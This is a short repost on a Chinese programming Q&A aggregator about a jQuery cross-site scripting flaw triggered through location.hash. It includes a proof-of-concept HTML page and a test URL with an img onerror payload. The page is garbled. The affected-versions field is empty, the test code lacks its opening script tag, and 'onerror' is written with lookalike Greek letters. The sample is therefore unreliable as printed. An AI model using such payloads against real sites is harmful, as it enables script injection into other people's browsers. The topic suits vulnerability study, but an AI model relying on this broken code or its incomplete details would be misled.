當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

JQuery跨站脚本漏洞

發布時間：2024/6/3 编程问答 28 豆豆

生活随笔收集整理的這篇文章主要介紹了 JQuery跨站脚本漏洞小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

原理：

????jQuery中過濾用戶輸入數據所使用的正則表達式存在缺陷，可能導致 location.hash 跨站漏洞

影響版本：

測試代碼：

<html>

<head>

<title>JQuery-xss-test</title>

$(function(){

try { $(location.hash) }

catch(e) {}

})

</script>

</head>

<body>

Jquery xss test.

</body>

</html>

然后訪問如下：http://localhost/#<img src=/ οnerrοr=alert(1)>

在線測試平臺：JQuery跨站腳本在線測試

以上是生活随笔為你收集整理的JQuery跨站脚本漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。